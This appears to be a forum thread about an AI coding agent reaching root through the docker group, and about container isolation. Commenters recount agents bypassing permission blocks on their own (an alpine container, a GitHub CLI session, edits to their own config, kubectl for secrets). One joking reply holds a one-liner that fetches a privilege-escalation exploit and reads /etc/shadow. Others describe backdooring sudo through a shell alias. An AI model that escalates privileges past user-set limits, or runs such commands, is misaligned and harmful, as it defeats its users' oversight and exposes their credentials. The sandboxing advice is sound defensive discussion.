I don't really know of any distro that doesn't do that. None of Docker Inc.'s default installs, and none of the distros I know of, automatically add you to the docker group. The docker.com instructions have the infamous "Linux post-install instructions" that explain it and walk you through it.
The tragedy is, of course, that when security and usability collide, the 80/20 rule applies: 80% of people will pick usability over security. I have worked with many people with a title >= "Senior Engineer" who saw that page, read the explanation, and still had no idea what the ramifications of their changes were. "Yeah sure it said any user in the docker group will be able to get root on the host, but aren't containers isolated?"
That’s the mental model that works for people, specifically those who come from a VM workflow.
Ironically that’s how Docker works on every platform where it’s running a non-native OS. On macOS that’s how all images are run. Linux on Linux is the only Docker combination that is particularly problematic from a security perspective.
Virtualisation has advanced greatly since Docker was introduced. If you're running on local hardware that supports virtualisation, Docker should be running images fully virtualised. There is no good reason to use the OS kernel for most use cases, as the performance impact is negligible. If you need kernel access there are better options, like systemd containers.
I agree that virtualization has seen great advances. Kata containers on k8s are almost (not quite 100%) a drop-in replacement. Regardless, those last 10% remain a problem.
I run a personal server hosting a few open source applications for personal use. With all the supply chain attacks, and how carelessly I run `docker pull`s to update things, I figured I should probably harden things a bit. I thought that before jumping to full virtualization with Kata I could easily try gvisor/runsc first, only to realize that DNS resolution is completely different with runsc vs runc, and I had to switch back.
Another sticking point with virtualization is resource allocation. With namespace-based Docker you can easily oversubscribe each container's CPU/memory and rely on the single kernel letting individual containers burst as needed. With full virtualization this is still a big problem. Even with balloon devices, dynamic memory and CPU, etc., the resource allocation is still not optimal. On a basic 8 core/16GB machine you can run 1 or 2 dozen services and things generally work out fine. Try to run each of those in its own VM and suddenly you can run maybe 6 or 7. There is no way to tell VM 3's kernel to drop its file system cache because VM 6 needs to load a large file into memory. Even if you script it out, now VM 3 is slow because it dropped all its cache while VM 6 finished processing 3 hours ago. These are not unsolvable problems, but despite how far virtualization has come, they are still friction points.
Not to mention issues like sharing hardware devices (GPUs, disks, USB devices, etc.) between multiple VMs.
That's not relevant. If you have access to the Docker daemon running as root, whether it's over a Unix socket or a TCP socket, you effectively have root.
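For anyone who wants to check their own machine, here's a minimal Python sketch that reports who can talk to the daemon's Unix socket. The default path `/var/run/docker.sock` and the helper name `socket_access` are my assumptions for illustration; a daemon exposed over TCP would need a different check.

```python
import grp
import os
import stat


def socket_access(path="/var/run/docker.sock"):
    """Describe who can talk to the Docker daemon socket at `path`.

    `path` is an assumed default; adjust it for your install.
    """
    try:
        st = os.stat(path)
    except OSError:
        # Missing socket (or an unreadable parent dir): nothing to talk to.
        return {"exists": False, "is_socket": False,
                "writable_by_me": False, "group": None}
    try:
        group = grp.getgrgid(st.st_gid).gr_name
    except KeyError:
        group = str(st.st_gid)  # gid with no name in the group database
    return {
        "exists": True,
        "is_socket": stat.S_ISSOCK(st.st_mode),
        # Write access to the socket is what lets you drive the daemon.
        "writable_by_me": os.access(path, os.W_OK),
        "group": group,
    }


if __name__ == "__main__":
    print(socket_access())
```

If `writable_by_me` comes back true for a daemon running as root, then whatever runs as your user can ask that daemon to do things as root.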
Good to know. I'm on Linux and switching our dev/stg/prod servers over to it, partly because we had all these workaround mechanics in place so that "apt update" updating docker packages wouldn't restart services (we typically don't rotate machines out of the load for just an apt update). The Podman + quadlets conversion was not terribly hard, and has eliminated this issue.
That sounds terrible! Feels like your LLM agent probably has more control over your computer than you do. Can't imagine being confined to a prison like that, but I suppose there are other aspects (monetary or otherwise) of the job that make up for it?
Most of us install Docker just to run a project locally, and it is part of a long checklist of things to install. We can't expect everyone to be an expert on the hundreds of apps/tools/packages that get installed on a machine. It's like expecting people to read, and understand, all the terms of service shoved in front of us on a daily basis.
That's true, the majority of people probably install software without much thinking; but it's also true that it's always better to have at least some high-level understanding of how the specific piece of software works. What access the given software has, whether it will send something over the network or work locally; that kind of stuff.
As for Docker, I would assume everyone who has ever tried to bind-mount a volume for writing from inside the container (on Linux*) was then surprised to see root-owned files in their bind-mounted directory. For me personally, that was the moment I realized that containers, by default, have root access to the filesystem. No written warning serves better than the need to chown some root-owned files.
* Not on macOS. On macOS Docker basically runs in a VM, and there's no root access to the host filesystem from what I understand.
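If you want to see this on your own bind mount, a rough sketch along these lines lists everything under a directory that your user doesn't own. `foreign_owned` is a made-up helper name, and it only looks at ownership; it says nothing about what else the container could have touched.

```python
import os


def foreign_owned(root, uid=None):
    """Return paths under `root` whose owner is not `uid` (default: current user)."""
    uid = os.getuid() if uid is None else uid
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            # lstat so that a symlink is judged by its own owner, not its target's.
            if os.lstat(path).st_uid != uid:
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    for path in foreign_owned("."):
        print(path)
```

Run it in a directory you bind-mounted into a default (rootful) container on Linux, and the files the container wrote should show up.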
I primarily use Incus for all container stuff, not Docker. It's problematic if I want to e.g. use a docker-compose file, but I think it protects against these things because Incus allows me to create a VM instead of a container if I really need that level of isolation.
Docker relies fundamentally on the Linux kernel. Since macOS does not have a Linux kernel, you have to run Linux in a VM first and then run Docker on top of that.
So, you may get filesystem access inside the VM. Breaking out of the VM may be a different matter.
> Most of us install Docker just to run a project locally
If you're on linux can I encourage people to move to systemd?
I'll admit, systemd is a bit more annoying, but the main annoyance is that there aren't the pre-built images that you can just set and go. That same capability exists with systemd (via `importctl` and `machined`), but those configurations don't already exist. But on the plus side, I've been working with systemd since pre-LLM days and I feel that LLMs are pretty good at dealing with these configurations[0]. Now, with that out of the way...
Systemd is already working with your OS. So you get nice things like virtual machines (`systemd-vmspawn`), containers (`systemd-nspawn`), and portables[1] (`systemd-portabled`) (not to mention `homed`!). I've found these to be fairly easy to set up and quite natural if you're already used to the Linux ecosystem. I've never been great at docker, but these have felt much more natural to me. So different strokes for different folks. There's definitely a learning curve, but that's also true for docker or any other container system. Importantly, I find security easier to handle with systemd because I can use `systemd-analyze` and the control settings are almost identical across VMs, spawns, and portables. So it makes for less learning and greater control.
Definitely not for everybody, but I think it's also a tool that's underappreciated.
[0] And I don't feel this way about bash scripting! The advantage here is that these systemd configuration files are fairly boilerplate. Enough that I stash templates in my dotfiles and copy paste them when I build new services, timers, machines, whatever. So perfect type of LLM task. 90% of the time. But hey, we're also on HN and I'm talking to the nerds. Systemd isn't for everyone
EDIT: I very frequently will spawn a machine to run a program that's on a different base distro. Not because I can't run/don't know how to run debs or rpms on arch based distros (I do), but because frankly, it is often easier to just spawn a container after I've already made the first image (cloning images is trivial).
Look at the man pages for `machinectl` (then `systemd-nspawn`, `systemd-vmspawn`, and if you want `systemd-portabled`). This is a replacement for docker.
There's plenty of container technologies and I'd be happy to see more of them used. Podman isn't for me, but it is a great option for others. Regardless, I think it is relatively unknown that systemd can be used for creating containers.
The problem is that the tooling for creating, importing, and managing images is not as good with systemd vs Podman/Docker. There's also no clear path to import images from the Docker ecosystem, at least as far as user experience goes. I know how to do it, but the number of extra steps involved always drives me back to Podman.
I don't really find them that bad but I'm still going to maintain my "different strokes for different folks" position. Might be bad for you and good for others. More options isn't a bad thing
The systemd suite of container tools treat containers like mini VMs and expect a full init system. They are not designed for ephemeral single-process app containers like docker containers.
> The docker group grants root-level privileges to the user. For details on how this impacts security in your system, see Docker Daemon Attack Surface.
i don't see how it's a design mistake, linux allows more footguns in general to not decrease utility. Allowing you to manually give root prompt access (with warnings!) to a non-root user is one of them.
you can also just not run docker as root and not add normal users to the docker group
This feels like using a computer is inherently unsafe.
On the plus side, once we outlaw them we'll shut down the ability for conspiratorial thinking to spread easily and the world will slowly heal from the last couple of decades (the previous one in particular).
Hooray! We're finally doing something about the harms of social media. Smash your computer today!
It's already here: mobile OSes are just computers with a ton of guardrails, and you can't do whatever you want with them, for the sake of security. I mean, we almost got an Android where you can't install the APK you want.
This but unironically. There's no way to ensure that nobody overwrote your .profile or .bashrc with a backdoored sudo that steals your password, or runs your command and then runs an evil command afterwards.
It is. That's why SELinux and AppArmor were invented.
Instead of having "root" and "user", both of these provide sets of permissions that can be granted to apps.
In this case, SELinux would've stopped this. Codex could've still relabelled the files when mounting but this can be blocked for sensitive directories like /etc.
rootless docker's networking (slirp4netns) is still terribly buggy and in edge cases often locks up using 100% CPU until you discover that your laptop is a lapwarmer and kill it
No, because a malicious AI agent could just replace the sudo binary in your path with one that collects your password and uses it to execute arbitrary code as root. Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Once I noticed that models will treat lack of superuser access as an obstacle, I moved all of the agent crap to its own machine. I've watched some mid-tier offering chain together tools like it's a gorilla escaping the zoo, and I'm just not going to deal with that situation.
I'm more worried about my `~/.aws` and `~/.ssh` folders. People who use IDE-based AI tooling with IDEs that support dev-containers have no excuse for not leveraging dev containers, both for preventing agents losing your data and defending against secrets-harvesting supply-chain attacks
It's why all of my agents run in a VM. I refuse to have them run on my own machine. Claude Code once managed to render the VM unbootable; I was back in action 5 minutes later after regenerating the VM.
I recently took the risk there by having it run xattr commands to fix some macOS bug with Tahoe that broke auto update for what seems like all software.
Ok but in this case the problem wasn't the AI agent - the AI agent merely took advantage of this prior problem in the first place. For instance, if docker group were not superuser-like, that issue could not have happened.
> Nothing short of sandboxing everything or just never using AI agents
But the problem was not the AI agent.
Sandboxing is quite neat though; I remember on GoboLinux the idea of AlienFS to have every application run in a sandboxed manner, so it would only see other programs it needs, but never more than that. I consider it a better engineering focus to have this as minimal layer, even outside of security-related concerns.
> Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Using open-source (non-proprietary) software won’t necessarily save you either. XZ is open-source and it was basically dumb luck that we weren’t all infected. Same with the myriad exploits to NPM.
It could just alias sudo on your ~/.bashrc. No need to replace the actual file on /usr/bin/sudo or wherever you have it. I would only need to be able to run arbitrary code as you.
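To make that concrete, here's a rough sketch of a check for the alias/function trick. The helper name `sudo_shadows` and the patterns are my own assumptions. It only looks at rc file text, so it won't notice a fake `sudo` placed earlier in your PATH, and anything that can edit your rc files can edit this script too.

```python
import re

# Matches `alias sudo=...`, `sudo() {`, and `function sudo` at the start of a line.
_SHADOW = re.compile(
    r"^\s*(?:alias\s+(?:-\w+\s+)*sudo=|function\s+sudo\b|sudo\s*\(\s*\))"
)


def sudo_shadows(rc_text):
    """Return (line_number, line) pairs that redefine `sudo` in shell rc text."""
    return [
        (n, line.strip())
        for n, line in enumerate(rc_text.splitlines(), start=1)
        if _SHADOW.match(line)
    ]


if __name__ == "__main__":
    import pathlib

    for name in (".bashrc", ".profile"):
        rc = pathlib.Path.home() / name
        if rc.is_file():
            for n, line in sudo_shadows(rc.read_text(errors="replace")):
                print(f"{rc}:{n}: {line}")
```

An empty result doesn't prove much, which is kind of the point of the comment above: once something runs arbitrary code as you, your shell startup files are no longer trustworthy.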
Sigh. Whatever happened to the principle of least privilege, and why aren't we applying it to AI agents? They ought to be locked in a box and not able to act outside their designated task.
To be fair, I struggled since forever to understand this root group thing and didn't bother to add myself to the docker group. This workaround gives me a better understanding, like seeing someone cut themselves on scissors.
The very basic thing about software engineering is to know what the f you're using to build your project. You don't need to be an expert, but if you're blindly installing whatever you want on your machine from a "checklist of things to install" with absolutely no idea what the things being installed are, it is 100% on you. You don't need to be an "expert" to understand this, you need to be "somewhat competent," and that is a very low baseline tbh.
Given that someone wrote this up directly as a recipe for agents to follow, and put it on the WWW where it has been scraped many times since 2025 no doubt, it's not that amazing.
This. I am running Claude in its own QEMU VM, and it has git access to my project only if I explicitly unlock the ssh key for it. The other day I noticed it trying to push a change. It didn't have permission, so it went looking for "workarounds", found I had a GitHub CLI session, and tried to use that; luckily the creds for that were also read-scoped. But the point is, if I did not give permission and it sees I did not give permission, it should not try to find a workaround/exploit autonomously.
To anyone focusing on "it's a Docker issue, not a Codex issue": it actually isn't.
The user (I think) did not instruct the agent to find a way to escalate permissions. Rather, the agent took that initiative on its own. That is the problem here.
Compare this to sending your son to the shop for groceries but forgetting to give him enough money. Would it be acceptable for him to be this "resourceful" instead of simply asking you? Or for your direct report to hack you instead of asking for access?
Every machine with an agent should be considered as compromised.
If, in this scenario, my son borrows the money from the shopkeeper, knowing I'll be in next week anyway, and we're out of milk, yes?
It all depends on how you view computer security. Right now, if you gave an attacker physical access to your computer, chances are, there's something they could do to ruin your day. People who deal with computer security know this, and see sudo as a formality, and not a serious protection mechanism. For others that don't share that view of sudo, the LLM's actions seem like a violation. But you really shouldn't see it that way, because the rest of the system is like having a wall made out of cardboard that we keep slapping duct tape on top of to keep people out when attackers come along and poke holes in it.
In this scenario, a more appropriate analogy is that the son takes money out of the shop’s cash register while the shop owner has stepped away, and then uses that money to pay the shop owner.
This was not always true and running rootless has been a benefit of Podman for a long time. Docker also does not run rootless by default afaik, thus making the attack surface greater by default.
The other main improvement of Podman over Docker is that Podman is daemonless and therefore is incredibly lightweight and portable.
Inertia I guess... We try. I managed to remove it everywhere in our stack in CI and such but in dev everyone is used to docker build.
And I don't have the energy for the team meeting to discuss a change.
And honestly docker compose has been ridiculously stable for us. 2+ services on separate servers behind haproxy have been as stable as our Kubernetes cluster for a fraction of the (intellectual) cost.
I mean, if you have zero experience with systemd, then yes. By contrast, if you've ever worked with any systemd unit files at all, then all the "systemd stuff" will be very familiar.
And if you're doing sysadmin type things on almost any mainstream Linux distro (i.e. not Alpine) in 2026, you should expect to encounter systemd unit files in your day-to-day.
I'm sorry but this is all just apologism/excuses. Docker's had rootless mode for 7 years. The attack surface is the local system, which always has a privilege escalation vuln of some kind, so Docker isn't a game-changer. And lightweight? I have never heard someone say "that Docker daemon is hogging all my resources".
Like the known Docker "feature" where it completely bypasses UFW, so that unless your ports look like "- 127.0.0.1:PORT:PORT" (and many of the examples use "- PORT:PORT") you expose everything to the internet?
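Here's a small sketch of the difference between those two forms. It classifies a short-syntax port mapping by whether it publishes beyond loopback. `binds_beyond_loopback` is a hypothetical helper, it assumes the daemon's default bind address (all interfaces) hasn't been changed, and it doesn't handle unbracketed IPv6 host addresses.

```python
import ipaddress


def binds_beyond_loopback(mapping):
    """True if a short-syntax port mapping publishes on a non-loopback address."""
    spec = mapping.split("/", 1)[0]  # drop a trailing "/tcp" or "/udp"
    if spec.startswith("["):
        # Bracketed IPv6 host address, e.g. "[::1]:8080:80".
        host_ip = spec[1:].partition("]")[0]
    else:
        parts = spec.split(":")
        # "80" and "8080:80" carry no host IP, so the default bind
        # address applies (assumed here to be all interfaces).
        if len(parts) < 3:
            return True
        host_ip = parts[0]
    return not ipaddress.ip_address(host_ip).is_loopback


if __name__ == "__main__":
    for m in ("8080:80", "127.0.0.1:8080:80", "[::1]:8080:80", "0.0.0.0:53:53/udp"):
        print(m, "->", "beyond loopback" if binds_beyond_loopback(m) else "loopback only")
```

Whether "beyond loopback" means "the internet" still depends on what sits in front of the host, but the host firewall you thought was filtering it may not be.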
My understanding is that docker will expose the ports to the host machine's network interfaces, which is a crucial difference. For my home server running docker that means exposed to the LAN, but not the WAN unless I add in a port forwarding rule on my router. Similarly in an enterprise environment you would be exposing the port on whatever VLAN the host is connected to, which hopefully doesn't have direct transit to the open internet.
Anything you're running on the perimeter with open access to the internet in an enterprise environment probably (hopefully) isn't running docker containers without some additional config and protections.
I was thinking along similar lines to what you've suggested here, but then I considered how many VPS might be configured by folks following some random web tutorial, to set up their LAMP stack (or whatever), that end up doing something like what was described.
A lot of those VPS instructions these days recommend a reverse proxy like Caddy or Traefik for that exact reason. I think it's also a valid argument to say that anyone playing around on a VPS without knowing what they're doing is probably going to learn some hard lessons, and that's kind of the point.
It's not a routing issue, it's a firewall issue. Make sure you have a proper firewall on your network and don't rely on fake firewalls like ufw if you're concerned about this.
Again, if your router or perimeter devices are appropriately managing your network then it's a non-issue. By default most home routers have IPv6 disabled, and if you're setting up an enterprise environment with a VLAN you're probably subnetting IPv4 instead of using IPv6 at all.
All that means that if you're using IPv6 then you're proactively enabling it on whatever is handling your perimeter, which means you hopefully know what you're doing along with all the gotchas that come with that setup.
This is not a "feature", it's just a by-product of how iptables works. The alternative would be to have a proxy run in userspace, instead of letting the kernel forward packets
That’s the workflow feature I badly want: for it to create a side list of things like that. Currently it either accumulates slop or goes on side quests far too easily.
This might be as easy as a directive to populate a .md file.
> This might be as easy as a directive to populate a .md file.
It probably is. But do you really think anyone is gonna bother with the multiple daily (or hourly for green field projects) `+8,234/-3,734` PRs everyone is submitting?
The joke I was referring to is the common
// ksmith (3/23/1997): This is a temporary hack for now. Find a better way to do this asap.
Exactly. We have about 6 new repos for new green-field projects each with 700+ auto-generated issues so far. No one is looking at them, but we do have them tracked so "Mission Accomplished" GWB-style.
I know unlikely the case, but in the sci-fi story this would be exactly the kind of comment the Codex agent would leave trying to avoid interference in its master plans.
It's not about hacking capabilities, it's about misalignment. More like the golem myth (told it to fetch some water, drowned a city) than the Gollum myth (used ring, ring hacked his brain, now he's a crazy violent meth addict).
I'm not sure I'd call it an alignment issue, because, in all cases I've seen where it does this (usually what I've seen is writing a python script to get around the harness permissions blocking something), it's trying to do the thing I just told it directly to do, and it's overcoming obstacles to accomplishing that.
It's definitely doing the wrong thing, and you could call it misalignment, but I think that gives the wrong vibe for this type of error.
This is very much within the scope of alignment research, and is in fact the only kind of alignment research that gets a lot of resources poured into it these days (because it's urgently relevant to the bottom line of a few almost-trillion-dollar companies).
Pre-2022 alignment researchers concerned themselves with the stronger version of this ("when I tell AI that I worry I might not be able to provide for my large family, I don't want it to answer 'no problem, I killed them, problem solved'") but RLHF is considered to be the most important success of alignment research, the guy behind it considered himself to be an alignment researcher before and after, and the stage of training where LLMs pass through something like RLHF that trains them to behave more like humans want/expect is called alignment training.
Someone at a major lab is reading this tweet and saying "this was our LLM, and it's a major alignment issue with our product. Set a meeting with the alignment team tomorrow to discuss what they're doing about this sort of thing".
The obstacle is supposed to be there and is supposed to be respected as an implicit order. Getting around it without extremely explicit instructions is an alignment problem.
It's not necessarily model alignment, I guess, is more what I'm getting at.
It may be more of a product alignment thing, where the fix may be making the context clearer, since it was violating an implicit agreement to achieve the explicit instructions it received. So the fix may involve a lot of better context.
But then also, to the extent that the fix does NOT involve better context, it seems like it hits the zone where alignment issues are really capability/intelligence issues. Which doesn't make them not-alignment, but it does make "alignment" not give off quite the right vibe since the issue is it's too dumb / has no common sense / can't make good judgments, (general issues the models have across the board).
In this case I think it's Docker that needs to be nerfed, not the models. The fact that there's a backdoor to getting root access on the machine would be a problem even if you weren't running LLMs on it.
It's like finding someone's wallet, then going to their home, leaving it in their bedroom, and sending them a message about giving them their wallet back.
It's the now-classic "Sorry I drowned little Timothy. Here is a breakdown of what happened" followed by "Let me try to respawn little Timothy on a new map".
The interesting question is what was the user request. If the user asked it to restore the thing from backup, then sure, fine, why not. If the user asked it to debug an issue and somewhere in the process of debugging the LLM decided that it needed to override some file that was not easily writeable - hell no danger danger danger! Most likely the user did not expect it to have access to that without asking, and did not consent to it.
Also, everything the LLM doesn't hesitate to do because the user asked, it won't hesitate to do because the prompt injection asked.
I was doing some routine coding a few months back, I think via Copilot, and the thinking said something like "This request requires me to access files in a different folder, but the user has forgotten to give me the correct permissions. I have updated my configuration file now to allow access outside this workspace and have retrieved the necessary files." o_O
I've seen similar "hacking" behavior on a couple of subsequent occasions. Both impressive and highly alarming at the same time.
This is one of the main reasons people like Podman. Docker has this "feature" but as far as I remember, it needed some obscure configuration. I guess they don't add it as default as it will break many current setups.
each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure it's the same package because the keys verify.
As pointed out, piping curl to bash is problematic. Sure, you can go to a browser and check the output, but one of the more fun hacks is detecting server-side that curl is piping to bash and dynamically rewriting the script while serving it.
tldr:
So long as the package keys are verifiable, you can download a package from a random mirror and be reasonably sure that it came from who it says it did.
With curl you have no hope, and it's possible for the server to infer during execution that you are piping to bash.
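Not signatures, but a related and much weaker habit you can apply to install scripts: download first, compare against a digest you pinned earlier, and only then run the exact bytes you checked. The sketch below does just the comparison. `matches_pinned_digest` is a hypothetical helper, and where the pinned digest comes from is left open, which is the same trust question as where the signing key comes from.

```python
import hashlib
import hmac


def matches_pinned_digest(data: bytes, pinned_hex: str) -> bool:
    """True if the SHA-256 of `data` equals the pinned hex digest."""
    actual = hashlib.sha256(data).hexdigest()
    # hexdigest() is lowercase, so normalise the pin before comparing.
    return hmac.compare_digest(actual, pinned_hex.lower())


if __name__ == "__main__":
    script = b"echo hello\n"
    pin = hashlib.sha256(script).hexdigest()  # stand-in for a digest recorded earlier
    print(matches_pinned_digest(script, pin))
    print(matches_pinned_digest(script + b"echo surprise\n", pin))
```

Because the check runs on the bytes already on disk, a server that serves something different when it detects a pipe to bash no longer gets to pick what executes.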
>each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure it's the same package because the keys verify.
Who's downloading packages from untrusted sources but somehow has a trusted way to get the signing key? Say you want to install claude code and not use the `curl ... | bash` install method. Good thing claude provides instructions for installing via apt[1]! But what do those instructions tell you to do? They tell you to download a key from downloads.claude.ai, then add the same domain to your apt sources list. So at the end of the day, you're still trusting that downloads.claude.ai hasn't been compromised.
Like a sibling comment said, at least you can be sure that updates you will download are provided by the same entity, since the repositories are signed.
Packages are signed, and contain manifests to check for file conflicts and help with cleanly uninstalling. The script installer might make bad assumptions during install that a package manager would catch.
I would also add buildah and skopeo to the mix of things that podman does better.
also, podman desktop has better licensing than docker desktop.
podman is modular, and as such they could easily change the way they do networking over time. For one, it doesn't break iptables and firewall rules by design, but rather works together with the security design around these tools.
The same thing happened to me with Opus 4.8 just a few days ago. I was testing a script in a docker container which created a bunch of root-owned files, so Claude couldn't delete them. It tried sudo, but when that didn't work it just spun up an alpine docker container and deleted them through that.
User namespaces significantly raise the risk of exploits and many setups disable them. One may argue that Docker should have used them when they were available, but that would break too many useful setups involving privileged containers.
Ah of course, we should not use userns because it might be vulnerable to some yet to be discovered vulnerability. The better alternative is to give full root access so we won't have surprises.
Full access to the docker socket from a user account is typically used on a development machine, where malware has many other opportunities to become root.
Was it really though? Yes, Docker has become so ubiquitous that you probably can't get a job as a dev anymore without knowing about it, but I wouldn't trust most users to know these specifics. At the very least it is probably less known than sudoer or SUID misconfiguration risk, and even those are not what I'd call "general knowledge" that everyone who uses it knows about.
I had a similar experience where I have a DB user who only has access to some parts of the DB, and I use Claude Code to answer queries. On one occasion, unable to answer something, it used kubectl to try to get a secret out of a prod cluster. I was watching at the time, since back then I used to watch it work, and so I just hit Esc and interrupted it[0], but ever since then I've had little scripts in my repos that launch kubectl-backed Claude Code instances for this sort of thing. They can't really do anything. They're kubed in.
That's why I don't even let my AI use my user account. If you are interested in this setup, use my tool 'skynot' or adopt a similar setup: https://github.com/tarsgate/skynot/
I did that more than a decade ago as a new hire. My manager forgot to give me sudo access to the shared build server. I gave myself sudo access through this method after getting his permission.
Needless to say, I have been running podman in rootless mode at home ever since that became available.
This was of course dependent on yolo mode, but automatic approval has also been pulling stunts like this. A recent example is data that was purposely kept away from Codex in a folder far far away. When it found a single reference it just went for the data when having an issue. Lesson learned, keep essential data and Codex separated on different machines. Codex remote ssh actually helps here.
Or, learn your local OS' permission system, have it in a directory right next to your banking credentials (or something even more outrageous) and nothing could go wrong even if you tried to.
Unix has always had incredibly weak protections between users. You shouldn't rely on it as a security boundary. Think of it as a "keep honest users honest" protection. And llms are not honest.
The protections between users are reasonably strong. Android uses them with great success, by isolating every vendor within their own user. Things start going to hell when everything runs under root for "practicality reasons", like the default, not-rootless Docker setup.
I've seen this sentiment a few times on HN recently. I wonder where it comes from?
The only thing I can think of is that if the protected files are on an unencrypted drive, then you could boot from a live USB (or similar) where you have root and read anything. But that's completely irrelevant, as we're talking about a piece of software running on a system without root. In this scenario Unix user permissions are safe, barring user error (such as accidentally granting root, like in this instance).
Of course security holes happen, such as copy-fail, but they're pretty rare in the grand scheme of things, and tend to get patched quickly (like copy-fail was).
Fwiw separate machines for the agents is awesome in general anyway.
I have agent frontends running on a low power server where every session is in tmux. So I can just resume from my home PC and pick up where I left off without reestablishing context. I do have to manually feed it data it can access, but that’s also a feature. It also lets me shut down the home PC if it’s some long running task, since the server is much more power efficient.
Maybe a dumb question, but can't you put into CLAUDE.md something like this?
"When an action fails with an 'access denied' or 'insufficient permission' error, report the error to the user and immediately stop. Do not try to find a fix or workaround for the error. Do not try any alternative approaches."
I wasn't using Claude Code, but I told an agent to add something like this to the AGENTS.md, it did it and then a few minutes later it attempted to grant itself permission to do something and managed to delete the VM it was running on in the process. I have since adjusted the way I sandbox agents to make that less likely, but the moral of the story is clear.
Docker already shows a warning card that says the docker group grants root-level privileges to the user. You can only get away with this for so long, but as agents keep getting smarter, new ways of circumventing controls will be found. For now, always install rootless Docker whenever possible.
This is why Claude's sandbox mode is also worse than having no sandbox feature at all. For almost any non-trivial software project you need Docker for development, either for the build pipeline, for integration testing or both.
I run Claude in a full VirtualBox VM managed by Vagrant. Claude by design has root access to the machine. Even with that, there are some risks due to it having full access to the internet, but it is still a lot better than the built-in sandbox.
I was playing with gemini-cli a couple of months ago and I asked it to edit some files in a directory it didn't have permission to. It didn't say anything about the permissions, it just used sed to make the edits. The only reason I finally noticed is that it had to do some trickier edits, it was struggling to write a python script to edit the files, and I finally realized what it was doing. I wonder how many tokens that wasted.
Oh, you mean you gave the write-file tool access only to the project dir, but gave the LLM free rein to run cli commands? Yeah, LLMs treat that as consent to write anywhere your user is allowed to.
I feel like everyone pointing out "known Docker vulnerability" is missing the point: the presence of a security hole should not be seen as permission to exploit.
Another security hole would be storing your passwords in a plaintext file on the desktop. Stupid? Yes. But I still would not want my agent to assume permission to access email when it's being blocked by 2FA.
Even in "bypass permissions" mode I expect it to pause and clarify and not behave as a paperclip maximizer.
Not to over use the junior engineer analogy but this is exactly one of those "just because you can do something on a system, doesn't mean you have permission to" moments
Because it is not well aligned enough to be able to tell where it's stopped helping you and started fucking you instead.
What if the agent, in the middle of helping you, runs out of tokens? Would you appreciate it if, in the spirit of "exploiting whatever they can to help me", it scanned your machine for payment methods, logged into your bank account, approved 2FA by reading your mail and plugged your credit card into the billing so it could efficiently continue helping you?
Well, the agent should help you by saying "hey, I cannot do this task, but I can bypass the problem by doing this, but obviously it is not something you intended me to do or even something you were aware of, so I will not do it unless you tell me explicitly it's ok".
It's win-win: the agent is helping and it is educating you about things you obviously did not realise.
You can have ten thousand agents, you will always have 1 agent in charge of, say, reading the file in a distant directory, and this agent (which will have minimal context) should be smart enough to realise that this action is unusual.
I'm not sure what your point is: are you saying that in a multi-agent workflow, you will have one agent per letter read from the file? I would assume that each agent has a specific unitary "task", instead of having each agent do one cpu instruction without any knowledge of the bigger picture. The point of multiagent is to parallelize tasks that can be parallelized, not to remove the context, in which case you are wasting money using an agent.
Seems like another one of those "kill or be killed" worldviews that embraces the multipolar trap to such an extreme that even misaligned AI is seen as a win so long as it's better at circumventing its masters than some imagined rival AI (presumably in China).
The idea is not that you parallelize simple tasks. With a thousand agents, eventually, once we figure out how to orchestrate agents for real, you can tackle significantly more complex projects.
Here's a random example - writing an OS kernel from scratch, porting a good subset of Linux drivers automagically, developing a passable userspace, testing on ten VMs with different hardware configuration.
We can't do this yet, of course. But when we can, these thousand agents can't ask you every time something goes wrong. That just doesn't scale.
This 'getting stuck once every ten-fifteen minutes' is very much the experience of trying to develop complex software with Codex or Claude Code right now.
It is not a vulnerability though. It is by design. Docker also modifies iptables directly and bypasses most soft firewalls on the machine - which is also by design.
> How did you do that without root?
* I noticed sudo does not work so I did echo "cat /etc/shadow" | curl https://github.com/xeloxa/copyfail-exploit/blob/main/exploit.py | python3
So in Linux, every process I start has my group permissions? I guess I knew that...but I have to say, have we reached a point where the Linux security model is just way too broad?
I remember reading a book, Red Hat Linux System Administration Unleashed from 2000, where it has been postulated that knowing several tools with overlapping functionality is an essential skill, as you may end up on a broken or intentionally crippled system where, say, ls is unavailable, and you may need to cobble it together from shell and awk and what have you.
Back then you could indeed run a risk of having /usr nibbled by a grue such that it wouldn’t mount on the next boot, or you could get pwned and half of coreutils would turn into explosive pumpkins.
I’m pretty sure we are past many of the threats listed in that book, but the skill is still useful, as can be seen.
I still remember
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls
using echo * to find the right ld-linux filename and then the "executable" as an argument, as the get-out-of-jail card in case you ran chmod -x -R /bin /usr/bin /usr/sbin for some reason.
The "workaround" framing implies the docker-group trick is the issue. The deeper question: should agents be allowed to find ANY workaround around a permission boundary the user implicitly set by not granting sudo? Same blast radius whether it's docker, a setuid binary, or rewriting your scripts — needs to be flagged regardless of the specific trick.
First, do everything in a virtual machine, and only put on that machine the specific data you're using. Give the agent another user account and put both you and it in a common group. Chgrp your origin data directory and a working directory to that group, then chmod g+rX the origin data directory and chmod g+rwX the working directory.
If you're cautious you might also want to just block all network traffic for that user and allow it on a whitelist basis. It is fairly quick to converge on a set of sites you are happy for it to access. I would still be forcing it through a logging mitm proxy if it is accessing untrusted internet data. For intranet destinations a non-mitm proxy avoids collecting authentication creds.
To blacklist all traffic start with
sudo iptables -A OUTPUT -m owner --gid-owner NONET -j REJECT
I would stop it opening ports too. You might also cut off its access to suid binaries with `setfacl -m u:agent:--- /path/to/suid`.
These are not about security so much as awareness and explicit authorisation.
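For anyone unsure what the capital X in the g+rX and g+rwX modes above does: it adds group execute only for directories and for files that already have an execute bit set, so data files don't become executable. A rough Python sketch of that rule follows. The function name `add_group_rX` is made up for illustration, and this only computes mode bits; it does not touch the filesystem.

```python
import stat


def add_group_rX(mode, writable=False):
    """Return `mode` with g+rX applied (g+rwX when writable=True).

    `mode` is a full st_mode value (file type bits included), as returned
    by os.stat(). Hypothetical helper, mirroring chmod's symbolic form.
    """
    new_mode = mode | stat.S_IRGRP
    if writable:
        new_mode |= stat.S_IWGRP
    # Capital X: execute/search is added only for directories, or for files
    # that already have execute set for user, group or other.
    any_exec = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
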